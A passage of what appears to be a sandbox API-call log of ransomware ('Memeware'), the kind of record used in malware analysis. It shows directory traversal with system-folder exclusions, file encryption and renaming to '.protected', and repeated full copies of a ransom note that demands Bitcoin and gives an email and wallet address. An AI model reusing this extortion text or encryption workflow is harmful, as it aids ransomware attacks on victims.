nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0074.915] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0074.915] CloseHandle (hObject=0xd8) returned 1 [0074.916] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.protected") returned 133 [0074.916] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.protected" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\cab1.cab.protected")) returned 1 [0074.916] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0074.916] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="Windows") returned -1 [0074.916] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="Program Files") returned 1 [0074.917] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="Program Files (x86)") returned 1 [0074.917] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="$Recycle.bin") returned 1 [0074.917] lstrcmpiW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="System Volume Information") returned 1 [0074.917] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi") returned 140 [0074.917] StrStrIW (lpFirst="vc_runtimeMinimum_x64.msi", lpSrch=".protected") returned 0x0 [0074.917] lstrcmpW (lpString1="vc_runtimeMinimum_x64.msi", lpString2="RESTORE_FILES.txt") returned 1 [0074.917] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0074.917] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0074.917] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0074.917] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi") returned 140 [0074.917] StrStrW (lpFirst="vc_runtimeMinimum_x64.msi", lpSrch=".txt") returned 0x0 [0074.917] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi") returned 140 [0074.917] StrStrW (lpFirst="vc_runtimeMinimum_x64.msi", lpSrch=".rar") returned 0x0 [0074.917] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi") returned 140 [0074.917] StrStrW (lpFirst="vc_runtimeMinimum_x64.msi", lpSrch=".zip") returned 0x0 [0074.917] ReadFile (in: hFile=0xd8, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0074.946] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.946] WriteFile (in: hFile=0xd8, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0074.946] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.947] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0074.947] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0074.947] CloseHandle (hObject=0xd8) returned 1 [0074.947] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.protected") returned 150 [0074.947] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.protected" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.protected")) returned 1 [0074.948] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0074.948] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0074.948] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\RESTORE_FILES.txt") returned 132 [0074.948] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0075.008] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0075.008] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0075.009] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0075.009] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0075.009] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0075.009] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0075.009] CloseHandle (hObject=0xd4) returned 1 [0075.010] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0075.010] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0075.010] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\RESTORE_FILES.txt") returned 109 [0075.010] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0075.011] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0075.011] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0075.011] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0075.011] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0075.011] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0075.011] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0075.012] CloseHandle (hObject=0xb4) returned 1 [0075.012] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0075.012] FindClose (in: hFindFile=0x490a28 | out: hFindFile=0x490a28) returned 1 [0075.013] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\RESTORE_FILES.txt") returned 100 [0075.013] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0075.014] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0075.014] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0075.014] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0075.014] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0075.015] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0075.015] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0075.015] CloseHandle (hObject=0xa4) returned 1 [0075.015] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0075.015] lstrcmpiW (lpString1="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpString2="Windows") returned -1 [0075.015] lstrcmpiW (lpString1="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpString2="Program Files") returned -1 [0075.015] lstrcmpiW (lpString1="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpString2="Program Files (x86)") returned -1 [0075.015] lstrcmpiW (lpString1="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpString2="$Recycle.bin") returned 1 [0075.015] lstrcmpiW (lpString1="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpString2="System Volume Information") returned -1 [0075.015] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030") returned 82 [0075.015] lstrcmpW (lpString1="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpString2=".") returned 1 [0075.015] lstrcmpW (lpString1="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpString2="..") returned 1 [0075.015] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*") returned 84 [0075.015] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x490a28 [0075.045] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0075.045] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0075.045] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0075.045] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0075.045] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0075.045] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\.") returned 84 [0075.045] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.045] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0075.045] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0075.045] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0075.045] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0075.046] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0075.046] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0075.046] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\..") returned 85 [0075.046] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0075.046] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.046] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0075.046] lstrcmpiW (lpString1="packages", lpString2="Windows") returned -1 [0075.046] lstrcmpiW (lpString1="packages", lpString2="Program Files") returned -1 [0075.046] lstrcmpiW (lpString1="packages", lpString2="Program Files (x86)") returned -1 [0075.046] lstrcmpiW (lpString1="packages", lpString2="$Recycle.bin") returned 1 [0075.046] lstrcmpiW (lpString1="packages", lpString2="System Volume Information") returned -1 [0075.046] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages") returned 91 [0075.046] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0075.046] lstrcmpW (lpString1="packages", lpString2="..") returned 1 [0075.046] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*") returned 93 [0075.046] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b7a8 [0075.047] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0075.047] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0075.047] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0075.047] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0075.047] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0075.048] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\.") returned 93 [0075.048] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.048] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0075.048] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0075.048] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0075.048] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0075.048] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0075.048] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0075.048] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\..") returned 94 [0075.048] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0075.048] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.048] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0075.048] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="Windows") returned -1 [0075.048] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="Program Files") returned 1 [0075.048] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="Program Files (x86)") returned 1 [0075.048] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="$Recycle.bin") returned 1 [0075.048] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="System Volume Information") returned 1 [0075.048] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86") returned 115 [0075.048] lstrcmpW (lpString1="vcRuntimeAdditional_x86", lpString2=".") returned 1 [0075.048] lstrcmpW (lpString1="vcRuntimeAdditional_x86", lpString2="..") returned 1 [0075.048] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: 